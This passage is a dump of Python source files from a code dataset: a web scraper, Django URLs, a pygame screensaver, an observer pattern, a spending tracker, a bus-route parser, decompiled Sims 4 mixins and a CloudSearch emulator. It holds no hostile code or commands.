n+1)) ** 2\n if n==1:\n return 1\n \nprint(sum_squaress(1))\nprint(sum_squaress(100))","sub_path":"quiz 1.py","file_name":"quiz 1.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"452481902","text":"import re\n\nimport requests as requests\nfrom bs4 import BeautifulSoup\n\nfrom mysqlDB import insert\n\n\ndef openUrl(url):\n res = requests.get(url)\n return res.text\n\ndef getTags(html,class_name):\n reg = r'
'\n pattern= re.compile(reg)\n tags= re.findall(pattern, html)\n return tags\n\ndef parserData(html):\n soup_string = BeautifulSoup(html, \"html.parser\")\n # cheilds = soup_string.find(id=\"newsList\")\n h3_list = soup_string.findAll('h3')\n for child in h3_list:\n href_link = child.a.get('href')\n if \"https://www\" in href_link:\n print(href_link)\n res = openUrl(href_link)\n parserArticle(res)\n\n\ndef parserArticle(html):\n soup_string = BeautifulSoup(html, \"html.parser\")\n cheilds = soup_string.find('h2')\n article_title = cheilds.string\n author_photo = ''\n if soup_string.select('.osc-avatar')[0].img:\n author_name = soup_string.select('.osc-avatar')[0].img.get('alt')\n author_photo = soup_string.select('.osc-avatar')[0].img.get('src')\n if soup_string.select('.osc-avatar')[0].span:\n author_name = soup_string.select('.osc-avatar')[0].contents\n\n if soup_string.select('.extra .item'):\n release_time = soup_string.select('.extra .item')[0].contents[2]\n if soup_string.select('.list .item'):\n release_time = soup_string.select('.list .item')[0].contents[2]\n article_content = soup_string.find(id='articleContent')\n news_links = ''\n print(article_title)\n if soup_string.select('.news-links'):\n news_links = soup_string.select('.news-links')[0]\n\n insert(article_title,author_name,author_photo,release_time,article_content,news_links)\n # tag = getTags(mainScreen.prettify(),'item')\n # print(tag)\n\nfor index in range(1000):\n try:\n html = openUrl('https://www.oschina.net/news/widgets/_news_index_generic_list?p=%s&type=ajax' %(index))\n parserData(html)\n except:\n pass","sub_path":"news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"320064119","text":"from django.conf.urls import url\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n \n # url(r'^home/$', views.home, name='home'),\n \n url(r'^$', views.home_projects, name='homePage'),\n url(r'^ajax/newsletter/$', views.newsletter, name='newsletter'),\n url(r'^api/profile/$', views.ProfileList.as_view()),\n url(r'^edit/profile$', views.edit_profile, name='edit_profile'),\n url(r'^profile/(?P[0-9]+)$',\n views.individual_profile_page, name='individual_profile_page'),\n url(r'^new/project$', views.new_project, name='new_project'), \n url(r'^image(\\d+)', views.project, name='project'), \n url(r'^new/image$', views.new_image, name='new_image'), \n url(r'^api/project/$', views.ProjectList.as_view()),\n\n]\nif settings.DEBUG:\n urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT) ","sub_path":"awward/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"228352408","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pygame\nimport random\nimport math\n\nSCREEN_DIM = (800, 600)\n\n\nclass Vec2d():\n def __init__(self, x):\n self.x = x\n\n def length(self, x):\n \"\"\"возвращает длину вектора\"\"\"\n return math.sqrt(self.x[0] * self.x[0] + self.x[1] * self.x[1])\n\n def __getitem__(self, i):\n return self.x[i]\n\n def int_pair(self):\n \"\"\"возвращает пару координат, определяющих вектор (координаты точки конца вектора),\n координаты начальной точки вектора совпадают с началом системы координат (0, 0)\"\"\"\n return int(self.x[0]), int(self.x[1])\n\n def __sub__(self, y):\n \"\"\"\"возвращает разность двух векторов\"\"\"\n return self.x[0] - y[0], self.x[1] - y[1]\n\n @staticmethod\n def __add__(x, y):\n \"\"\"возвращает сумму двух векторов\"\"\"\n return Vec2d((x[0] + y[0], x[1] + y[1]))\n\n def __mul__(self, k):\n \"\"\"возвращает произведение вектора на число\"\"\"\n return Vec2d((self.x[0] * k, self.x[1] * k))\n\n# =======================================================================================\n# Функции, отвечающие за расчет сглаживания ломаной\n# =======================================================================================\n\nclass Polyline():\n def __init__(self, points, count):\n self.points = points\n self.count = count\n \n def get_point(self, points, alpha, deg=None):\n \"\"\"функция получает на вход 3 базовые точки и шаг например 1/35\n рекурсивно суммируем вектора начиная с самого первого\n v = add(mul(point[1], 1/35), mul(point[0], 34/35))\n потом то что получилось на этом шаге возвращаем в второй аргумент\n add(mul(point[2], 1/35), mul(v, 34/35))\n тоесть берем первый вектор с большим коэффициентом а другие все с маленьким\n далее когда alpha будет расти будет первый вектор с маленькам коэффициентом\n \"\"\"\n if deg is None:\n deg = len(points) - 1\n if deg == 0:\n return points[0]\n v1 = points[deg].__mul__(alpha)\n v2 = self.get_point(points, alpha, deg - 1).__mul__(1 - alpha)\n\n return Vec2d.__add__(v1, v2)\n\n def get_points(self, base_points, count):\n \"\"\"функция получает на вход 3 базовые точки\n и кол-во шагов которые нужно добавить\n Получаем n промежуточных точек\n \"\"\"\n alpha = 1 / count\n res = []\n for i in range(count):\n p = self.get_point(base_points, i * alpha)\n res.append(p)\n\n return res\n\n def set_points(self, speeds):\n \"\"\"функция перерасчета координат опорных точек\"\"\"\n for p in range(len(self.points)):\n self.points[p] = Vec2d.__add__(self.points[p], speeds[p])\n if self.points[p][0] > SCREEN_DIM[0] or self.points[p][0] < 0:\n speeds[p] = [- speeds[p][0], speeds[p][1]]\n if self.points[p][1] > SCREEN_DIM[1] or self.points[p][1] < 0:\n speeds[p] = [speeds[p][0], -speeds[p][1]]\n\n\nclass Knot(Polyline):\n def __init__(self, points, count):\n super().__init__(points, count)\n\n def get_knot(self):\n if len(self.points) < 3:\n return []\n res = []\n for i in range(-2, len(self.points) - 2):\n ptn = []\n ptn.append(Vec2d.__add__(self.points[i], self.points[i + 1]).__mul__(0.5)) # Добавляем среднюю точку между i и i+1\n ptn.append(points[i + 1])\n ptn.append(Vec2d.__add__(self.points[i + 1], self.points[i + 2]).__mul__(0.5)) # Добавляем среднюю точку между i + 1 и i + 2\n res.extend(self.get_points(ptn, self.count)) # Дополняет список элементами из указанного объекта.\n return res\n\n\n# =======================================================================================\n# Функции отрисовки\n# =======================================================================================\ndef draw_points(points, style=\"points\", width=3, color=(255, 255, 255)):\n \"\"\"функция отрисовки точек на экране\"\"\"\n if style == \"line\":\n for p_n in range(-1, len(points) - 1):\n intp1, intp2 = points[p_n].int_pair(), points[p_n + 1].int_pair()\n pygame.draw.line(gameDisplay, color,\n (intp1[0], intp1[1]),\n (intp2[0], intp2[1]), width)\n\n elif style == \"points\":\n for p in points:\n intp = p.int_pair()\n pygame.draw.circle(gameDisplay, color,\n (intp[0], intp[1]), width)\n\ndef draw_help():\n \"\"\"функция отрисовки экрана справки программы\"\"\"\n gameDisplay.fill((50, 50, 50))\n font1 = pygame.font.SysFont(\"courier\", 24)\n font2 = pygame.font.SysFont(\"serif\", 24)\n data = []\n data.append([\"F1\", \"Show Help\"])\n data.append([\"R\", \"Restart\"])\n data.append([\"P\", \"Pause/Play\"])\n data.append([\"Num+\", \"More points\"])\n data.append([\"Num-\", \"Less points\"])\n data.append([\"Q\", \"Speed Up\"])\n data.append([\"W\", \"Speed Down\"])\n data.append([\"D\", \"Delete last point\"])\n data.append([\"\", \"\"])\n data.append([str(steps), \"Current points\"])\n\n pygame.draw.lines(gameDisplay, (255, 50, 50, 255), True, [\n (0, 0), (800, 0), (800, 600), (0, 600)], 5)\n for i, text in enumerate(data):\n gameDisplay.blit(font1.render(\n text[0], True, (128, 128, 255)), (100, 100 + 30 * i))\n gameDisplay.blit(font2.render(\n text[1], True, (128, 128, 255)), (200, 100 + 30 * i))\n\ndef change_speed(speeds, change):\n for speed in speeds:\n speed[0] = 0.1 if speed[0] + change <= 0 else speed[0] + change \n speed[1] = 0.1 if speed[1] + change <= 0 else speed[1] + change \n\n# =======================================================================================\n# Основная программа\n# =======================================================================================\nif __name__ == \"__main__\":\n pygame.init()\n gameDisplay = pygame.display.set_mode(SCREEN_DIM)\n pygame.display.set_caption(\"MyScreenSaver\")\n\n steps = 35\n working = True\n points = []\n speeds = []\n show_help = False\n pause = True\n\n hue = 0\n color = pygame.Color(0)\n knt = Knot(points, steps)\n\n while working:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n working = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n working = False\n if event.key == pygame.K_r:\n points = []\n speeds = []\n if event.key == pygame.K_p:\n pause = not pause\n if event.key == pygame.K_KP_PLUS:\n steps += 1\n if event.key == pygame.K_F1:\n show_help = not show_help\n if event.key == pygame.K_KP_MINUS:\n steps -= 1 if steps > 1 else 0\n if event.key == pygame.K_d:\n points.pop()\n if event.key == pygame.K_q:\n change_speed(speeds, 1)\n if event.key == pygame.K_w:\n change_speed(speeds, -1)\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n points.append(Vec2d(event.pos))\n speeds.append([random.random() * 2, random.random() * 2])\n\n gameDisplay.fill((0, 0, 0)) # background color\n hue = (hue + 1) % 360\n color.hsla = (hue, 100, 50, 100) # (hue, saturation, lightness) alpha\n draw_points(points)\n knt.points = points\n draw_points(knt.get_knot(), \"line\", 3, color)\n if not pause:\n knt.set_points(speeds)\n if show_help:\n draw_help()\n\n pygame.display.flip()\n\n pygame.display.quit()\n pygame.quit()\n exit(0)\n","sub_path":"Coursera/C2/week2/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":8738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"305887527","text":"\nclass Event(list):\n\tdef __call__(self, *args, **kwargs):\n\t\tfor item in self:\n\t\t\titem(*args, **kwargs)\n\t\t\t\n\t\t\t\nclass PropertyObservable:\n\tdef __init__(self):\n\t\tself.property_changed=Event()\n\t\t\n\nclass Person(PropertyObservable):\n\tdef __init__(self, age=0):\n\t\tsuper().__init__()\n\t\tself._age=age\n\t\t\n\t@property\n\tdef can_vote(self):\n\t\treturn self._age>=18\n\t\t\n\t@property\n\tdef age(self):\n\t\treturn self._age\n\t\t\n\t@age.setter\n\tdef age(self, value):\n\t\tif self._age==value:\n\t\t\treturn\n\t\told_can_vote=self.can_vote\n\t\tself._age=value\n\t\tself.property_changed('age', value)\n\t\t\n\t\tif old_can_vote!=self.can_vote:\n\t\t\tself.property_changed('can_vote', self.can_vote)\n\n\nclass TrafficAuthority:\n\tdef __init__(self, person):\n\t\tself.person=person\n\t\tperson.property_changed.append(self.person_changed)\n\t\t\t\n\tdef person_changed(self, name, value):\n\t\tif name=='age':\n\t\t\tif value<=16:\n\t\t\t\tprint('Sorry, to young to drive.')\n\t\t\telse:\n\t\t\t\tprint('You can drive.')\n\t\t\t\tself.person.property_changed.remove(self.person_changed)\n\t\tif name=='can_vote':\n\t\t\tprint(f'Can vote: {value}')\n\t\t\n\t\t\n#test\np=Person(18)\nta=TrafficAuthority(p)\nfor age in range(14, 20):\n\tprint(f'Setting age to {age}')\n\tp.age=age","sub_path":"Patterns/observer/prop_obs.py","file_name":"prop_obs.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"192739808","text":"#!/usr/bin/env python\n# -*- encoding: utf-8\n\nimport collections\nimport datetime as dt\nimport json\nimport math\nimport os\nimport re\nimport sys\n\n\nROOT = os.path.join(os.environ['HOME'], 'Dropbox', 'spending')\n\nif len(sys.argv) >= 2:\n DAYS_TO_GET = int(sys.argv[1])\nelse:\n DAYS_TO_GET = 14\n\n\nif __name__ == '__main__':\n spending = {\n (dt.datetime.now() - dt.timedelta(days=x)).date(): []\n for x in range(DAYS_TO_GET + 1)\n }\n\n tagged_spending = collections.Counter()\n\n for root, _, filenames in os.walk(ROOT):\n\n # Check we're in a YYYY/MM/DD directory\n if not re.search(r'\\d{4}/\\d{2}/\\d{2}$', root):\n continue\n\n date_string = root[-len('DDDD/DD/DD'):]\n date = dt.datetime.strptime(date_string, '%Y/%m/%d').date()\n\n if (dt.datetime.now().date() - date).days > DAYS_TO_GET:\n continue\n\n for f in filenames:\n path = os.path.join(root, f)\n data = json.load(open(path))\n spending[date].append(data['amount'])\n for t in data['tags']:\n tagged_spending[t] += data['amount']\n\n\n print('')\n print('## Spending by day ##')\n print('')\n max_spend = max(sum(v) for v in spending.values())\n increment = max_spend / 20\n\n for d, expenses in sorted(spending.items()):\n total = '%3.2f' % sum(expenses)\n units = int(math.floor(sum(expenses) / increment))\n print('%s\\t%s\\t%s' % (\n d.strftime('%Y-%m-%d'),\n total.rjust(6),\n u'█' * units or '▏'))\n\n print(\n ' ' * 16 +\n ('%.2f' % sum(sum(v) for v in spending.values())).rjust(6)\n )\n\n print('\\n')\n\n print('## Spending by tag ##')\n print('')\n max_spend = max(sum(v) for v in spending.values())\n increment = max_spend / 20\n\n for t, value in tagged_spending.most_common(20):\n total = '%.2f' % value\n units = int(math.floor(value / increment))\n print('%s\\t%s\\t%s' % (\n t.ljust(20),\n total.rjust(6),\n u'█' * units or u'▏'))\n","sub_path":"spending-tracker/print_summary.py","file_name":"print_summary.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"42989563","text":"from route_validator import validate_route\n\ndef process_resp(routes, dt, option): \n data = {}\n count_route = 1\n\n for route in routes:\n if count_route > 3:\n break\n \n route_key = \"Route_\" + str(count_route)\n data[route_key] = {}\n other_transit = False\n\n count_step = 1\n steps = route['legs'][0]['steps']\n bus_journeys = 0\n valid_routes = 0\n for step in steps:\n step_key = \"Step_\" + str(count_step)\n data[route_key][step_key] = {}\n try:\n transit_details = step['transit_details']\n if transit_details['line']['vehicle']['type'] == 'BUS':\n bus_journeys += 1\n dep_name = str(transit_details['departure_stop'][\"name\"])\n arr_name = str(transit_details['arrival_stop'][\"name\"])\n data[route_key][step_key][\"Instructions\"] = step['html_instructions']\n data[route_key][step_key][\"Departure Stop\"] = transit_details['departure_stop']\n data[route_key][step_key][\"Arrival Stop\"] = transit_details['arrival_stop']\n data[route_key][step_key][\"Departure Stop Name\"] = dep_name\n data[route_key][step_key][\"Arrival Stop Name\"] = arr_name\n data[route_key][step_key][\"Line\"] = transit_details['line']['short_name'].upper()\n data[route_key][step_key][\"Num Stops\"] = transit_details['num_stops']\n data[route_key][step_key][\"Departure Time\"] = transit_details['departure_time'][\"text\"]\n data[route_key][step_key][\"Arrival Time\"] = transit_details['arrival_time'][\"text\"]\n route_validation = validate_route(\n transit_details['departure_stop'],\n transit_details['arrival_stop'],\n transit_details['line'][\"short_name\"].upper())\n data[route_key][step_key][\"Route Validation\"] = route_validation\n\n if route_validation[\"Status code\"] == 0:\n valid_routes += 1\n else:\n other_transit = True\n\n except Exception as e:\n data[route_key][step_key][\"Instructions\"] = step['html_instructions'] \n finally:\n count_step += 1\n\n data[route_key][\"routable\"] = \"b\" if valid_routes == bus_journeys and bus_journeys != 0 \\\n and not other_transit else \"w\" if valid_routes > 0 and bus_journeys == 0 and not other_transit \\\n else \"n\"\n \n data[route_key][\"schedule\"] = {\"datetime\": dt, \"option\": option}\n \n count_route += 1\n\n return data","sub_path":"Dublink-Bus-master/app/dir_api_resp.py","file_name":"dir_api_resp.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"292377791","text":"from typing import Dict, Union\n\nimport torch\nfrom torch.autograd import Variable\nimport numpy\n\n\ndef arrays_to_variables(data_structure: Dict[str, Union[dict, numpy.ndarray]],\n cuda_device: int = -1):\n \"\"\"\n Convert an (optionally) nested dictionary of arrays to Pytorch ``Variables``,\n suitable for use in a computation graph.\n \"\"\"\n if isinstance(data_structure, dict):\n for key, value in data_structure.items():\n data_structure[key] = arrays_to_variables(value)\n return data_structure\n else:\n torch_variable = Variable(torch.from_numpy(data_structure))\n if cuda_device == -1:\n return torch_variable\n else:\n return torch_variable.cuda(cuda_device)\n","sub_path":"allennlp/common/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"517821789","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\objects\\mixins.py\n# Compiled at: 2020-10-09 22:38:14\n# Size of source mod 2**32: 18034 bytes\nfrom _collections import defaultdict\nfrom collections import namedtuple\nimport weakref\nfrom interactions import ParticipantType\nfrom interactions.utils.tunable_provided_affordances import TunableProvidedAffordances\nfrom sims4.tuning.tunable import TunableReference, TunableSet, TunableMapping\nfrom sims4.utils import flexmethod\nfrom singletons import EMPTY_SET\nimport clock, services, sims4.log\nlogger = sims4.log.Logger('InUse')\n\nclass _CraftingLockoutData:\n\n def __init__(self):\n self._crafting_lockout_ref_counts = {}\n\n def add_lockout(self, crafting_type):\n if self._crafting_lockout_ref_counts.get(crafting_type):\n self._crafting_lockout_ref_counts[crafting_type] += 1\n else:\n self._crafting_lockout_ref_counts[crafting_type] = 1\n\n def get_ref_count(self, crafting_type, from_autonomy=False):\n ref_count = self._crafting_lockout_ref_counts.get(crafting_type)\n if ref_count:\n return ref_count\n return 0\n\n\nclass LockoutMixin:\n\n def __init__(self, *args, **kwargs):\n (super().__init__)(*args, **kwargs)\n self._lockouts = weakref.WeakKeyDictionary()\n self._crafting_lockouts = weakref.WeakKeyDictionary()\n\n def add_lockout(self, obj, duration_in_sim_minutes):\n if self is obj:\n return\n else:\n interval = clock.interval_in_sim_minutes(duration_in_sim_minutes)\n end_time = services.time_service().sim_now + interval\n lockout = self._lockouts.get(obj, None)\n if lockout is None or lockout < end_time:\n self._lockouts[obj] = end_time\n crafting_lockout = self._crafting_lockouts.get(obj, None)\n if crafting_lockout is None:\n crafting_lockout_data = None\n for super_affordance in obj.super_affordances():\n if hasattr(super_affordance, 'crafting_type_requirement'):\n if super_affordance.crafting_type_requirement is not None:\n if crafting_lockout_data is None:\n crafting_lockout_data = _CraftingLockoutData()\n crafting_lockout_data.add_lockout(super_affordance.crafting_type_requirement)\n\n if crafting_lockout_data is not None:\n self._crafting_lockouts[obj] = crafting_lockout_data\n\n def clear_all_lockouts(self):\n self._lockouts = weakref.WeakKeyDictionary()\n self._crafting_lockouts = weakref.WeakKeyDictionary()\n\n def has_lockout(self, obj):\n lockout = self._lockouts.get(obj, None)\n if lockout:\n if lockout < services.time_service().sim_now:\n del self._lockouts[obj]\n if obj in self._crafting_lockouts:\n del self._crafting_lockouts[obj]\n return False\n return True\n return False\n\n def get_lockouts_gen(self):\n current_time = services.time_service().sim_now\n for obj in self._lockouts:\n lockout = self._lockouts.get(obj, None)\n if lockout >= current_time:\n yield (\n obj, lockout - current_time)\n\n def get_autonomous_crafting_lockout_ref_count(self, crafting_type):\n ref_count = 0\n for crafting_lockout_data in self._crafting_lockouts.values():\n ref_count += crafting_lockout_data.get_ref_count(crafting_type)\n\n return ref_count\n\n\nclass InUseError(Exception):\n\n def __init__(self, obj):\n self.obj = obj\n\n def __str__(self):\n return 'Attempt to reserve an unavailable object - ' + str(self.obj)\n\n\nclass NotInUseError(Exception):\n\n def __init__(self, obj):\n self.obj = obj\n\n def __str__(self):\n return 'Attempt to release an object that is already free - ' + str(self.obj)\n\n\nProvidedAffordanceData = namedtuple('ProvidedAffordanceData', ('affordance', 'object_filter',\n 'allow_self'))\nInventoryProvidedAfforanceData = namedtuple('InventoryProvidedAffordanceData', ('affordance',\n 'object_filter',\n 'allow_self',\n 'provider_id'))\n\nclass AffordanceCacheMixin:\n __slots__ = ()\n\n def __init__(self, *args, **kwargs):\n (super().__init__)(*args, **kwargs)\n self._super_affordances_cache = None\n self._target_provided_affordances_cache = None\n self._actor_mixers_cache = None\n self._provided_mixers_cache = None\n\n def add_to_affordance_caches(self, super_affordances, target_provided_affordances):\n if super_affordances:\n if self._super_affordances_cache is None:\n self._super_affordances_cache = set()\n self._super_affordances_cache.update(super_affordances)\n if target_provided_affordances:\n if self._target_provided_affordances_cache is None:\n self._target_provided_affordances_cache = []\n for provided_affordance_data in target_provided_affordances:\n self._target_provided_affordances_cache.append(provided_affordance_data)\n\n def add_to_actor_mixer_cache(self, actor_mixers):\n if actor_mixers:\n if self._actor_mixers_cache is None:\n self._actor_mixers_cache = defaultdict(set)\n for super_affordance, mixer_affordances in actor_mixers.items():\n self._actor_mixers_cache[super_affordance].update(mixer_affordances)\n\n def add_to_provided_mixer_cache(self, provided_mixers):\n if provided_mixers:\n if self._provided_mixers_cache is None:\n self._provided_mixers_cache = defaultdict(set)\n for super_affordance, mixer_affordances in provided_mixers.items():\n self._provided_mixers_cache[super_affordance].update(mixer_affordances)\n\n def get_provided_super_affordances(self):\n return (None, None)\n\n def get_actor_and_provided_mixers_list(self):\n return (None, None)\n\n def get_sim_info_from_provider(self):\n raise NotImplementedError\n\n def update_affordance_caches(self):\n self._super_affordances_cache = None\n self._target_provided_affordances_cache = None\n self._actor_mixers_cache = None\n self._provided_mixers_cache = None\n super_affordances, target_provided_affordances = self.get_provided_super_affordances()\n self.add_to_affordance_caches(super_affordances, target_provided_affordances)\n list_actor_mixers, list_provided_mixers = self.get_actor_and_provided_mixers_list()\n if list_actor_mixers is not None:\n for actor_mixers in list_actor_mixers:\n self.add_to_actor_mixer_cache(actor_mixers)\n\n if list_provided_mixers is not None:\n for provided_mixers in list_provided_mixers:\n self.add_to_provided_mixer_cache(provided_mixers)\n\n def get_cached_super_affordances_gen(self):\n if self._super_affordances_cache is not None:\n yield from self._super_affordances_cache\n if False:\n yield None\n\n def get_cached_target_super_affordances_gen(self, context, target):\n sim_info = self.get_sim_info_from_provider()\n affordances_to_skip = set()\n if self._target_provided_affordances_cache is not None:\n for provided_affordance_data in self._target_provided_affordances_cache:\n if provided_affordance_data.object_filter is None and provided_affordance_data.allow_self is None:\n yield provided_affordance_data.affordance\n else:\n if target.is_sim:\n if target.sim_info is sim_info:\n if not provided_affordance_data.allow_self:\n continue\n if provided_affordance_data.affordance in affordances_to_skip:\n continue\n if not provided_affordance_data.object_filter.is_object_valid(target, sim=(context.sim)):\n continue\n if not provided_affordance_data.affordance.test_affordance_filters(context.sim, target):\n continue\n affordances_to_skip.add(provided_affordance_data.affordance)\n yield (\n provided_affordance_data.affordance, provided_affordance_data)\n\n def get_cached_target_provided_affordances_data_gen(self):\n if self._target_provided_affordances_cache is not None:\n yield from self._target_provided_affordances_cache\n if False:\n yield None\n\n def get_cached_actor_mixers(self, super_interaction):\n if self._actor_mixers_cache is not None:\n if super_interaction in self._actor_mixers_cache:\n return self._actor_mixers_cache[super_interaction]\n return EMPTY_SET\n return EMPTY_SET\n\n def get_cached_provided_mixers_gen(self, super_interaction):\n if self._provided_mixers_cache is not None:\n yield from self._provided_mixers_cache.get(super_interaction, ())\n if False:\n yield None\n\n\nclass SuperAffordanceProviderMixin:\n INSTANCE_TUNABLES = {'super_affordances': TunableSet(description='\\n Super affordances this adds to the object.\\n ',\n tunable=TunableReference(description='\\n A super affordance added to this object.\\n ',\n manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n class_restrictions=('SuperInteraction', ),\n pack_safe=True))}\n FACTORY_TUNABLES = INSTANCE_TUNABLES\n\n @classmethod\n def get_provided_super_affordances_gen(cls):\n yield from cls.super_affordances\n if False:\n yield None\n\n\nclass TargetSuperAffordanceProviderMixin:\n INSTANCE_TUNABLES = {'target_super_affordances': TunableProvidedAffordances(description='\\n Super affordances this adds to the target.\\n ',\n locked_args={'target':ParticipantType.Object, \n 'carry_target':ParticipantType.Invalid, \n 'is_linked':False, \n 'unlink_if_running':False})}\n FACTORY_TUNABLES = INSTANCE_TUNABLES\n\n\nclass MixerProviderMixin:\n INSTANCE_TUNABLES = {'provided_mixers': TunableMapping(description='\\n Mixers this adds to an associated target object.\\n ',\n key_type=TunableReference(description='\\n The super affordance these mixers are associated with.\\n ',\n manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n class_restrictions=('SuperInteraction', ),\n pack_safe=True),\n value_type=TunableSet(description='\\n Set of mixer affordances associated with the super affordance.\\n ',\n tunable=TunableReference(manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n category='asm',\n description='Linked Affordance',\n class_restrictions=('MixerInteraction', ),\n pack_safe=True)))}\n\n @flexmethod\n def get_mixers(cls, inst, super_interaction):\n inst_or_cls = inst if inst is not None else cls\n mixers = inst_or_cls.provided_mixers.get(super_interaction, [])\n return mixers\n\n\nclass MixerActorMixin:\n INSTANCE_TUNABLES = {'actor_mixers': TunableMapping(description='\\n Mixers this adds to an associated actor object. (When targeting\\n something else.)\\n ',\n key_type=TunableReference(description='\\n The super affordance these mixers are associated with.\\n ',\n manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n class_restrictions=('SuperInteraction', ),\n pack_safe=True),\n value_type=TunableSet(description='\\n Set of mixer affordances associated with the super affordance.\\n ',\n tunable=TunableReference(description='\\n Linked mixer affordance.\\n ',\n manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n category='asm',\n class_restrictions=('MixerInteraction', ),\n pack_safe=True)))}\n\n @flexmethod\n def get_actor_mixers(cls, inst, super_interaction):\n inst_or_cls = inst if inst is not None else cls\n mixers = inst_or_cls.actor_mixers.get(super_interaction, [])\n return mixers","sub_path":"Scripts/simulation/objects/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":13558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"585089816","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/vagrant/src/nozama-cloudsearch/nozama-cloudsearch-data/nozama/cloudsearch/data/document.py\n# Compiled at: 2013-12-03 06:00:21\n\"\"\"\n\"\"\"\nimport os, logging\nfrom pyelasticsearch import ElasticHttpNotFoundError\nfrom nozama.cloudsearch.data.db import db\nfrom nozama.cloudsearch.data.db import get_es\n\ndef get_log(e=None):\n return logging.getLogger(('{0}.{1}').format(__name__, e) if e else __name__)\n\n\ndef all():\n \"\"\"Return all the stored documents.\n \"\"\"\n log = get_log('all')\n conn = db().conn()\n returned = list(conn.documents.find())\n log.debug((\"Returning '{0}' documents\").format(len(returned)))\n return returned\n\n\ndef removed():\n \"\"\"Return all the documents which have been removed.\n \"\"\"\n log = get_log('removed')\n conn = db().conn()\n returned = list(conn.documents_removed.find())\n log.debug((\"Returning '{0}' documents\").format(len(returned)))\n return returned\n\n\nimport formencode\nfrom formencode import validators\n\nclass FieldsSchema(formencode.Schema):\n \"\"\"The data to be searched. I think anything goes here.\n \"\"\"\n allow_extra_fields = True\n\n\nclass DocSchema(formencode.Schema):\n \"\"\"Validate the document and the add/remove operation.\n\n \"\"\"\n allow_extra_fields = True\n id = validators.String(not_empty=True, strip=True)\n lang = validators.String(not_empty=True, strip=True, if_missing='en')\n version = validators.String(not_empty=True, strip=True)\n type = validators.OneOf([\n 'add', 'delete'], not_empty=True, strip=True)\n\n\nDOC_SCHEMA = DocSchema()\nHEADERS = {'Content-Type': 'application/json'}\n\ndef add_to_elasticsearch(doc):\n \"\"\"This indexes the fields and puts them into cloud search for later\n searching.\n\n \"\"\"\n log = get_log('add_to_elasticsearch')\n es = get_es()\n log.debug(('adding doc <{0}>').format(doc['id']))\n result = es.conn.index(es.index, es.doc_type, doc['fields'], id=doc['_id'])\n es.conn.refresh(es.index)\n log.debug(('doc <{0}> add result: {1}').format(doc['id'], result))\n\n\ndef remove_from_elasticsearch(doc):\n \"\"\"Remove this document from the index.\n\n \"\"\"\n log = get_log('remove_from_elasticsearch')\n es = get_es()\n log.debug(('remove doc <{0}>').format(doc['id']))\n result = es.conn.delete(es.index, es.doc_type, id=doc['_id'])\n es.conn.refresh(es.index)\n log.debug(('doc <{0}> remove result: {1}').format(doc['id'], result))\n\n\ndef search(query={}):\n \"\"\"Perform a search across text fields.\n\n :returns: A dict compatible with an Amazon CloudSearch response.\n\n \"\"\"\n log = get_log('search')\n es = get_es()\n qstring = query.get('q', '')\n log.debug((\"searching query '{0}'\").format(query))\n try:\n if qstring:\n query = {'query': {'query_string': {'query': ('{0}*').format(qstring)}}}\n results = es.conn.search(query, index=es.index)\n else:\n query = {'query': {'match_all': {}}}\n results = es.conn.search(query, index=es.index)\n except ElasticHttpNotFoundError:\n results = dict(hits=dict(hits=[], total=0), took=0)\n\n rc = {'rank': '-text_relevance', \n 'match-expr': (\"(label '{0}')\").format(qstring), \n 'hits': {'found': results['hits']['total'], \n 'start': 0, \n 'hit': [ {'id': i['_id']} for i in results['hits']['hits'] ]}, \n 'info': {'rid': os.urandom(40).encode('hex'), \n 'time-ms': results['took'], \n 'cpu-time-ms': 0}}\n log.debug((\"found '{0}'\").format(rc))\n return rc\n\n\ndef load(docs_to_load):\n \"\"\"Load documents in the Amazon SDF an add/remove from mongo accordingly.\n\n Each document will be validated against DocSchema.\n\n :returns: An amazon compatible documents/batch Response Property dict.\n\n For example:\n\n .. code-block:: python\n\n rc = dict(\n status='ok',\n adds=len(to_load),\n deletes=len(to_remove),\n error='',\n warning='',\n )\n\n Reference:\n * http://docs.aws.amazon.com/cloudsearch/latest/developerguide/ 